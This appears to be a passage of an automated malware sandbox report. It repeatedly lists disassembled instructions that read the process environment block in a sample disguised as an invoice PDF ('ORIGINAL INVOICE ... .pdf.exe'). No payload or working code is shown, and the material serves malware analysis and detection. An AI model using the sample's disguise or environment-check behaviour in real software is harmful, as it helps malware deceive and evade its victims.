            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE3DB mov ecx, dword ptr fs:[00000030h]3_2_01ABE3DB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABE3DB mov eax, dword ptr fs:[00000030h]3_2_01ABE3DB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB43D4 mov eax, dword ptr fs:[00000030h]3_2_01AB43D4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB43D4 mov eax, dword ptr fs:[00000030h]3_2_01AB43D4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE8324 mov eax, dword ptr fs:[00000030h]3_2_01AE8324
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE8324 mov ecx, dword ptr fs:[00000030h]3_2_01AE8324
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE8324 mov eax, dword ptr fs:[00000030h]3_2_01AE8324
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE8324 mov eax, dword ptr fs:[00000030h]3_2_01AE8324
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A30B mov eax, dword ptr fs:[00000030h]3_2_01A4A30B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A30B mov eax, dword ptr fs:[00000030h]3_2_01A4A30B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A30B mov eax, dword ptr fs:[00000030h]3_2_01A4A30B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C310 mov ecx, dword ptr fs:[00000030h]3_2_01A0C310
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A30310 mov ecx, dword ptr fs:[00000030h]3_2_01A30310
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB437C mov eax, dword ptr fs:[00000030h]3_2_01AB437C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A92349 mov eax, dword ptr fs:[00000030h]3_2_01A92349
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE634F mov eax, dword ptr fs:[00000030h]3_2_01AE634F
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov ecx, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9035C mov eax, dword ptr fs:[00000030h]3_2_01A9035C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB8350 mov ecx, dword ptr fs:[00000030h]3_2_01AB8350
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADA352 mov eax, dword ptr fs:[00000030h]3_2_01ADA352
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202A0 mov eax, dword ptr fs:[00000030h]3_2_01A202A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202A0 mov eax, dword ptr fs:[00000030h]3_2_01A202A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov ecx, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA62A0 mov eax, dword ptr fs:[00000030h]3_2_01AA62A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E284 mov eax, dword ptr fs:[00000030h]3_2_01A4E284
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E284 mov eax, dword ptr fs:[00000030h]3_2_01A4E284
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90283 mov eax, dword ptr fs:[00000030h]3_2_01A90283
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A202E1 mov eax, dword ptr fs:[00000030h]3_2_01A202E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A1A2C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE62D6 mov eax, dword ptr fs:[00000030h]3_2_01AE62D6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0823B mov eax, dword ptr fs:[00000030h]3_2_01A0823B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14260 mov eax, dword ptr fs:[00000030h]3_2_01A14260
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0826B mov eax, dword ptr fs:[00000030h]3_2_01A0826B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC0274 mov eax, dword ptr fs:[00000030h]3_2_01AC0274
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A98243 mov eax, dword ptr fs:[00000030h]3_2_01A98243
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A98243 mov ecx, dword ptr fs:[00000030h]3_2_01A98243
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0A250 mov eax, dword ptr fs:[00000030h]3_2_01A0A250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE625D mov eax, dword ptr fs:[00000030h]3_2_01AE625D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A16259 mov eax, dword ptr fs:[00000030h]3_2_01A16259
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA250 mov eax, dword ptr fs:[00000030h]3_2_01ACA250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA250 mov eax, dword ptr fs:[00000030h]3_2_01ACA250
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A905A7 mov eax, dword ptr fs:[00000030h]3_2_01A905A7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A345B1 mov eax, dword ptr fs:[00000030h]3_2_01A345B1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A345B1 mov eax, dword ptr fs:[00000030h]3_2_01A345B1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12582 mov eax, dword ptr fs:[00000030h]3_2_01A12582
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A12582 mov ecx, dword ptr fs:[00000030h]3_2_01A12582
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A44588 mov eax, dword ptr fs:[00000030h]3_2_01A44588
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E59C mov eax, dword ptr fs:[00000030h]3_2_01A4E59C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A125E0 mov eax, dword ptr fs:[00000030h]3_2_01A125E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E5E7 mov eax, dword ptr fs:[00000030h]3_2_01A3E5E7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C5ED mov eax, dword ptr fs:[00000030h]3_2_01A4C5ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C5ED mov eax, dword ptr fs:[00000030h]3_2_01A4C5ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E5CF mov eax, dword ptr fs:[00000030h]3_2_01A4E5CF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E5CF mov eax, dword ptr fs:[00000030h]3_2_01A4E5CF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A165D0 mov eax, dword ptr fs:[00000030h]3_2_01A165D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A4A5D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A5D0 mov eax, dword ptr fs:[00000030h]3_2_01A4A5D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20535 mov eax, dword ptr fs:[00000030h]3_2_01A20535
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E53E mov eax, dword ptr fs:[00000030h]3_2_01A3E53E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6500 mov eax, dword ptr fs:[00000030h]3_2_01AA6500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4500 mov eax, dword ptr fs:[00000030h]3_2_01AE4500
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4656A mov eax, dword ptr fs:[00000030h]3_2_01A4656A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18550 mov eax, dword ptr fs:[00000030h]3_2_01A18550
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18550 mov eax, dword ptr fs:[00000030h]3_2_01A18550
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A164AB mov eax, dword ptr fs:[00000030h]3_2_01A164AB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A444B0 mov ecx, dword ptr fs:[00000030h]3_2_01A444B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9A4B0 mov eax, dword ptr fs:[00000030h]3_2_01A9A4B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA49A mov eax, dword ptr fs:[00000030h]3_2_01ACA49A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A104E5 mov ecx, dword ptr fs:[00000030h]3_2_01A104E5
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0E420 mov eax, dword ptr fs:[00000030h]3_2_01A0E420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0C427 mov eax, dword ptr fs:[00000030h]3_2_01A0C427
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A96420 mov eax, dword ptr fs:[00000030h]3_2_01A96420
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48402 mov eax, dword ptr fs:[00000030h]3_2_01A48402
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C460 mov ecx, dword ptr fs:[00000030h]3_2_01A9C460
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3A470 mov eax, dword ptr fs:[00000030h]3_2_01A3A470
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4E443 mov eax, dword ptr fs:[00000030h]3_2_01A4E443
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3245A mov eax, dword ptr fs:[00000030h]3_2_01A3245A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ACA456 mov eax, dword ptr fs:[00000030h]3_2_01ACA456
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0645D mov eax, dword ptr fs:[00000030h]3_2_01A0645D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC47A0 mov eax, dword ptr fs:[00000030h]3_2_01AC47A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A107AF mov eax, dword ptr fs:[00000030h]3_2_01A107AF
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB678E mov eax, dword ptr fs:[00000030h]3_2_01AB678E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E7E1 mov eax, dword ptr fs:[00000030h]3_2_01A9E7E1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
